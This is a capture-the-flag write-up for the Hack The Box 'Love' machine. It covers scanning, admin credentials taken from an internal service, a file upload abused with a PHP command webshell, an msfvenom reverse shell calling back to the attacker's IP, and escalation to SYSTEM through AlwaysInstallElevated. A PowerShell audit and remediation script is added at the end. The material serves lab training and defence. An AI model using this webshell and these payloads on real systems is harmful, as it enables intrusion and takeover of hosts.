HTB-love

0x00. Overview

0x01. Information gathering

The scan results are below. HTTP is served on ports 80 and 5000, and the certificate on port 443 reveals the hostname staging.love.htb, so add a hosts entry:

10.10.10.239 staging.love.htb

┌──(root💀kali)-[~/htb/love]
└─# nmap -sC -sV -sT 10.10.10.239 -oN nmap.CVT
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-05 01:31 EDT
Nmap scan report for staging.love.htb (10.10.10.239)
Host is up (0.40s latency).
Not shown: 993 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27)
|_http-title: Secure file scanner
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
443/tcp open ssl/http Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
|_http-title: 403 Forbidden
| ssl-cert: Subject: commonName=staging.love.htb/organizationName=ValentineCorp/stateOrProvinceName=m/countryName=in
| Not valid before: 2021-01-18T14:00:16
|_Not valid after: 2022-01-18T14:00:16
445/tcp open microsoft-ds Windows 10 Pro 19042 microsoft-ds (workgroup: WORKGROUP)
3306/tcp open mysql?
| fingerprint-strings:
| GetRequest, Help, LDAPSearchReq, NULL:
|_ Host '10.10.17.216' is not allowed to connect to this MariaDB server
5000/tcp open http Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
|_http-title: 403 Forbidden
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3306-TCP:V=7.91%I=7%D=8/5%Time=610B77EA%P=x86_64-pc-linux-gnu%r(NUL
SF:L,4B,"G\0\0\x01\xffj\x04Host\x20'10\.10\.17\.216'\x20is\x20not\x20allow
SF:ed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(GetRequest,4
SF:B,"G\0\0\x01\xffj\x04Host\x20'10\.10\.17\.216'\x20is\x20not\x20allowed\
SF:x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(Help,4B,"G\0\0\
SF:x01\xffj\x04Host\x20'10\.10\.17\.216'\x20is\x20not\x20allowed\x20to\x20
SF:connect\x20to\x20this\x20MariaDB\x20server")%r(LDAPSearchReq,4B,"G\0\0\
SF:x01\xffj\x04Host\x20'10\.10\.17\.216'\x20is\x20not\x20allowed\x20to\x20
SF:connect\x20to\x20this\x20MariaDB\x20server");
Service Info: Hosts: www.example.com, LOVE, www.love.htb; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 2h45m34s, deviation: 4h02m32s, median: 25m32s
| smb-os-discovery:
| OS: Windows 10 Pro 19042 (Windows 10 Pro 6.3)
| OS CPE: cpe:/o:microsoft:windows_10::-
| Computer name: Love
| NetBIOS computer name: LOVE\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2021-08-04T22:58:30-07:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-08-05T05:58:29
|_ start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 143.66 seconds

0x02. Visiting port 80

Just a login form.

0x03. Visiting port 5000

Access is denied (403, no permission).

0x04. Directory enumeration

The directories admin, dist, images, includes and plugins turn up; visiting them reveals no sensitive information.

┌──(root💀kali)-[~/htb/love]
└─# gobuster dir -u http://10.10.10.239 -w /usr/share/wordlists/dirb/common.txt -t 50
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.10.239
[+] Method: GET
[+] Threads: 50
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2021/08/05 01:49:07 Starting gobuster in directory enumeration mode
===============================================================
/.htpasswd (Status: 403) [Size: 302]
/.htaccess (Status: 403) [Size: 302]
/.hta (Status: 403) [Size: 302]
/ADMIN (Status: 301) [Size: 337] [--> http://10.10.10.239/ADMIN/]
/Admin (Status: 301) [Size: 337] [--> http://10.10.10.239/Admin/]
/admin (Status: 301) [Size: 337] [--> http://10.10.10.239/admin/]
/aux (Status: 403) [Size: 302]
/cgi-bin/ (Status: 403) [Size: 302]
/com2 (Status: 403) [Size: 302]
/com3 (Status: 403) [Size: 302]
/com1 (Status: 403) [Size: 302]
/con (Status: 403) [Size: 302]
/dist (Status: 301) [Size: 336] [--> http://10.10.10.239/dist/]
/examples (Status: 503) [Size: 402]
/images (Status: 301) [Size: 338] [--> http://10.10.10.239/images/]
/Images (Status: 301) [Size: 338] [--> http://10.10.10.239/Images/]
/includes (Status: 301) [Size: 340] [--> http://10.10.10.239/includes/]
/index.php (Status: 200) [Size: 4388]
/licenses (Status: 403) [Size: 421]
/lpt1 (Status: 403) [Size: 302]
/lpt2 (Status: 403) [Size: 302]
/nul (Status: 403) [Size: 302]
/phpmyadmin (Status: 403) [Size: 302]
/plugins (Status: 301) [Size: 339] [--> http://10.10.10.239/plugins/]
/prn (Status: 403) [Size: 302]
/server-status (Status: 403) [Size: 421]
/server-info (Status: 403) [Size: 421]
/webalizer (Status: 403) [Size: 302]

===============================================================
2021/08/05 01:49:46 Finished
===============================================================


0x05. Visiting the admin directory

The login form in the admin directory differs somewhat from the default one.

0x06. Visiting staging.love.htb

This is a web crawler (file scanner) tool, and it ships with a demo page.

Test it against ports 80 and 5000.

Port 5000 returns the admin credentials.

0x07. Logging in as admin

user:admin

pass:@LoveIsInTheAir!!!!

Browsing the application manually, there is a file upload under the photo field; testing it shows that the file type is not restricted.

Uploading the reverse shell that ships with Kali failed.

0x08. Using Godzilla

1. First generate the shell

2. Upload it

3. Visit it to get a shell

Add the target in Godzilla

Getting a meterpreter shell back through Godzilla failed here:

msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 0.0.0.0:5555
[*] Sending stage (39282 bytes) to 10.10.10.239
[*] - Meterpreter session 1 closed. Reason: Died
[-] Meterpreter session 1 is not valid and will be closed

0x09. Using Behinder

The Godzilla reverse shell failed, but Behinder worked; it still cannot escalate privileges, though.

0x10. Privilege escalation

Generate the payload with msfvenom:

┌──(root💀kali)-[/usr/share/webshells/php]
└─# msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.17.216 LPORT=6666 -f exe > /root/htb/love/sb.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 354 bytes
Final size of exe file: 73802 bytes

First upload a small webshell that can run system commands, then upload sb.exe to get a reverse shell.

<?php

if(isset($_REQUEST['cmd'])){
echo "<pre>";
$cmd = ($_REQUEST['cmd']);
system($cmd);
echo "</pre>";
die;
}

?>

Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd

Start the msf listener:

msf6 exploit(multi/handler) > options 

Module options (exploit/multi/handler):

Name Current Setting Required Description
---- --------------- -------- -----------


Payload options (windows/meterpreter/reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 10.10.17.216 yes The listen address (an interface may be specified)
LPORT 6666 yes The listen port


Exploit target:

Id Name
-- ----
0 Wildcard Target


msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.10.17.216:6666


Run sb.exe.

This gives a shell, but getsystem cannot escalate privileges:

msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.10.17.216:6666
[*] Sending stage (175174 bytes) to 10.10.10.239
[*] Meterpreter session 10 opened (10.10.17.216:6666 -> 10.10.10.239:52612) at 2021-08-05 04:07:09 -0400

meterpreter > getuid
Server username: LOVE\Phoebe
meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: Access is denied. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
[-] Named Pipe Impersonation (RPCSS variant)
meterpreter >

Escalate with always_install_elevated:

meterpreter > background 
[*] Backgrounding session 10...
msf6 exploit(multi/handler) > sessions

Active sessions
===============

Id Name Type Information Connection
-- ---- ---- ----------- ----------
10 meterpreter x86/windows LOVE\Phoebe @ LOVE 10.10.17.216:6666 -> 10.10.10.239:52612 (10.10.10.239)

msf6 exploit(multi/handler) > use exploit/windows/local/always_install_elevated
[*] Using configured payload windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/always_install_elevated) > set session 10
session => 10
msf6 exploit(windows/local/always_install_elevated) > options

Module options (exploit/windows/local/always_install_elevated):

Name Current Setting Required Description
---- --------------- -------- -----------
SESSION 10 yes The session to run this module on.


Payload options (windows/meterpreter/reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 10.10.17.216 yes The listen address (an interface may be specified)
LPORT 6666 yes The listen port


Exploit target:

Id Name
-- ----
0 Windows


msf6 exploit(windows/local/always_install_elevated) > run

[*] Started reverse TCP handler on 10.10.17.216:6666
[*] Uploading the MSI to C:\Users\Phoebe\AppData\Local\Temp\pqfzrkZhtqhj.msi ...
[*] Executing MSI...
[*] Sending stage (175174 bytes) to 10.10.10.239
[+] Deleted C:\Users\Phoebe\AppData\Local\Temp\pqfzrkZhtqhj.msi
[*] Meterpreter session 11 opened (10.10.17.216:6666 -> 10.10.10.239:52625) at 2021-08-05 04:10:28 -0400

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > pwd
C:\WINDOWS\system32
meterpreter > cd /
meterpreter > pwd
C:\
meterpreter > dir
Listing: C:\
============

Mode Size Type Last modified Name
---- ---- ---- ------------- ----
40777/rwxrwxrwx 4096 dir 2015-07-10 07:04:22 -0400 $Recycle.Bin
40777/rwxrwxrwx 0 dir 2021-04-12 16:17:58 -0400 $WinREAgent
40777/rwxrwxrwx 4096 dir 2021-04-12 15:55:58 -0400 Administration
100666/rw-rw-rw- 1 fil 2015-07-10 09:20:06 -0400 BOOTNXT
40777/rwxrwxrwx 0 dir 2015-07-10 08:21:38 -0400 Documents and Settings
0000/--------- 0 fif 1969-12-31 19:00:00 -0500 DumpStack.log.tmp
40777/rwxrwxrwx 0 dir 2019-12-07 04:14:52 -0500 PerfLogs
40555/r-xr-xr-x 4096 dir 2019-12-07 04:14:52 -0500 Program Files
40555/r-xr-xr-x 4096 dir 2019-12-07 04:14:52 -0500 Program Files (x86)
40777/rwxrwxrwx 4096 dir 2019-12-07 04:14:52 -0500 ProgramData
40777/rwxrwxrwx 0 dir 2021-04-12 15:18:22 -0400 Recovery
40777/rwxrwxrwx 4096 dir 2021-04-12 15:16:36 -0400 System Volume Information
40555/r-xr-xr-x 4096 dir 2019-12-07 04:03:44 -0500 Users
40777/rwxrwxrwx 16384 dir 2019-12-07 04:03:44 -0500 Windows
100444/r--r--r-- 395268 fil 2015-07-10 09:20:06 -0400 bootmgr
0000/--------- 0 fif 1969-12-31 19:00:00 -0500 pagefile.sys
0000/--------- 0 fif 1969-12-31 19:00:00 -0500 swapfile.sys
40777/rwxrwxrwx 12288 dir 2021-04-12 11:16:48 -0400 xampp

meterpreter > cd Users
meterpreter > dir
Listing: C:\Users
=================

Mode Size Type Last modified Name
---- ---- ---- ------------- ----
40777/rwxrwxrwx 8192 dir 2021-04-12 17:06:49 -0400 Administrator
40777/rwxrwxrwx 0 dir 2019-12-07 04:30:39 -0500 All Users
40555/r-xr-xr-x 8192 dir 2019-12-07 04:03:44 -0500 Default
40777/rwxrwxrwx 0 dir 2019-12-07 04:30:39 -0500 Default User
40777/rwxrwxrwx 8192 dir 2021-04-12 17:41:34 -0400 Phoebe
40555/r-xr-xr-x 4096 dir 2019-12-07 04:14:52 -0500 Public
100666/rw-rw-rw- 174 fil 2019-12-07 04:14:54 -0500 desktop.ini

meterpreter > cd Administrator
meterpreter > dir
Listing: C:\Users\Administrator
===============================

Mode Size Type Last modified Name
---- ---- ---- ------------- ----
40555/r-xr-xr-x 0 dir 2021-04-12 17:55:12 -0400 3D Objects
40777/rwxrwxrwx 0 dir 2021-04-12 17:06:49 -0400 AppData
40777/rwxrwxrwx 0 dir 2021-04-12 17:06:50 -0400 Application Data
40555/r-xr-xr-x 0 dir 2021-04-12 17:55:12 -0400 Contacts
40777/rwxrwxrwx 0 dir 2021-04-12 17:06:50 -0400 Cookies
40555/r-xr-xr-x 0 dir 2021-04-12 17:06:49 -0400 Desktop
40555/r-xr-xr-x 4096 dir 2021-04-12 17:06:49 -0400 Documents
40555/r-xr-xr-x 0 dir 2021-04-12 17:06:49 -0400 Downloads
40555/r-xr-xr-x 0 dir 2021-04-12 17:06:49 -0400 Favorites
40555/r-xr-xr-x 0 dir 2021-04-12 17:06:49 -0400 Links
40777/rwxrwxrwx 0 dir 2021-04-12 17:06:50 -0400 Local Settings
40555/r-xr-xr-x 0 dir 2021-04-12 17:06:49 -0400 Music
40777/rwxrwxrwx 0 dir 2021-04-12 17:06:50 -0400 My Documents
100666/rw-rw-rw- 1048576 fil 2021-04-12 17:06:49 -0400 NTUSER.DAT
100666/rw-rw-rw- 65536 fil 2021-04-12 17:06:50 -0400 NTUSER.DAT{53b39e88-18c4-11ea-a811-000d3aa4692b}.TM.blf
100666/rw-rw-rw- 524288 fil 2021-04-12 17:06:50 -0400 NTUSER.DAT{53b39e88-18c4-11ea-a811-000d3aa4692b}.TMContainer0000000000
0000000001.regtrans-ms
100666/rw-rw-rw- 524288 fil 2021-04-12 17:06:50 -0400 NTUSER.DAT{53b39e88-18c4-11ea-a811-000d3aa4692b}.TMContainer0000000000
0000000002.regtrans-ms
40777/rwxrwxrwx 0 dir 2021-04-12 17:06:50 -0400 NetHood
40555/r-xr-xr-x 0 dir 2021-04-12 18:00:20 -0400 OneDrive
40555/r-xr-xr-x 0 dir 2021-04-12 17:06:49 -0400 Pictures
40777/rwxrwxrwx 0 dir 2021-04-12 17:06:50 -0400 PrintHood
40777/rwxrwxrwx 0 dir 2021-04-12 17:06:50 -0400 Recent
40555/r-xr-xr-x 0 dir 2021-04-12 17:06:49 -0400 Saved Games
40555/r-xr-xr-x 0 dir 2021-04-12 17:55:12 -0400 Searches
40777/rwxrwxrwx 0 dir 2021-04-12 17:06:50 -0400 SendTo
40777/rwxrwxrwx 0 dir 2021-04-12 17:06:50 -0400 Start Menu
40777/rwxrwxrwx 0 dir 2021-04-12 17:06:50 -0400 Templates
40555/r-xr-xr-x 0 dir 2021-04-12 17:06:49 -0400 Videos
100666/rw-rw-rw- 316416 fil 2021-04-12 17:06:50 -0400 ntuser.dat.LOG1
100666/rw-rw-rw- 90112 fil 2021-04-12 17:06:50 -0400 ntuser.dat.LOG2
100666/rw-rw-rw- 20 fil 2021-04-12 17:06:50 -0400 ntuser.ini

meterpreter > cd Desktop
meterpreter > dir
Listing: C:\Users\Administrator\Desktop
=======================================

Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100666/rw-rw-rw- 282 fil 2021-04-12 17:55:12 -0400 desktop.ini
100444/r--r--r-- 34 fil 2021-04-13 06:20:17 -0400 root.txt

meterpreter > cat root.txt
*************************************
meterpreter >
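As an added example (not part of the original writeup or of the Metasploit module), here is a PowerShell audit for the misconfiguration the always_install_elevated module relies on: the policy only takes effect when the AlwaysInstallElevated DWORD is 1 under both HKLM and HKCU, so the check reads both hives, lists recent MsiInstaller events (the module drops and executes an MSI from the user's Temp directory, as the output above shows), and offers a remediation. The function names Get-AlwaysInstallElevatedState, Get-RecentMsiInstalls and Disable-AlwaysInstallElevated are my own.

```powershell
# Added example, not from the original post: audit and fix AlwaysInstallElevated.
# The policy is only effective when BOTH values below are 1.
$InstallerPolicyPaths = @{
    Machine = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\Installer'
    User    = 'HKCU:\SOFTWARE\Policies\Microsoft\Windows\Installer'
}

function Get-AlwaysInstallElevatedState {
    $state = @{}
    foreach ($scope in $InstallerPolicyPaths.Keys) {
        $item = Get-ItemProperty -Path $InstallerPolicyPaths[$scope] `
                                 -Name AlwaysInstallElevated -ErrorAction SilentlyContinue
        # A missing key or value means the policy is not set, which behaves like 0.
        $state[$scope] = if ($null -eq $item) { 0 } else { [int]$item.AlwaysInstallElevated }
    }
    [pscustomobject]@{
        Machine    = $state.Machine
        User       = $state.User
        Vulnerable = ($state.Machine -eq 1 -and $state.User -eq 1)
    }
}

function Get-RecentMsiInstalls {
    # Windows Installer logs every install to the Application log under the
    # MsiInstaller provider; an MSI executed out of a Temp folder is worth a look.
    Get-WinEvent -FilterHashtable @{ LogName = 'Application'; ProviderName = 'MsiInstaller' } `
                 -MaxEvents 20 -ErrorAction SilentlyContinue |
        Select-Object TimeCreated, Id, Message
}

function Disable-AlwaysInstallElevated {
    # Remediation: explicitly set both values to 0 (HKLM needs administrative rights).
    foreach ($path in $InstallerPolicyPaths.Values) {
        if (-not (Test-Path $path)) { New-Item -Path $path -Force | Out-Null }
        Set-ItemProperty -Path $path -Name AlwaysInstallElevated -Value 0 -Type DWord
    }
}

$result = Get-AlwaysInstallElevatedState
$result
if ($result.Vulnerable) {
    Write-Warning 'AlwaysInstallElevated is set in both hives: any user can install an MSI as SYSTEM.'
    Get-RecentMsiInstalls | Format-Table -AutoSize
}
```

The HKCU value reflects the account running the script, so run the audit as the user being reviewed (Phoebe in the writeup above), and run Disable-AlwaysInstallElevated from an elevated prompt.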
------------- The paper is short but the feeling runs long; see you next time -------------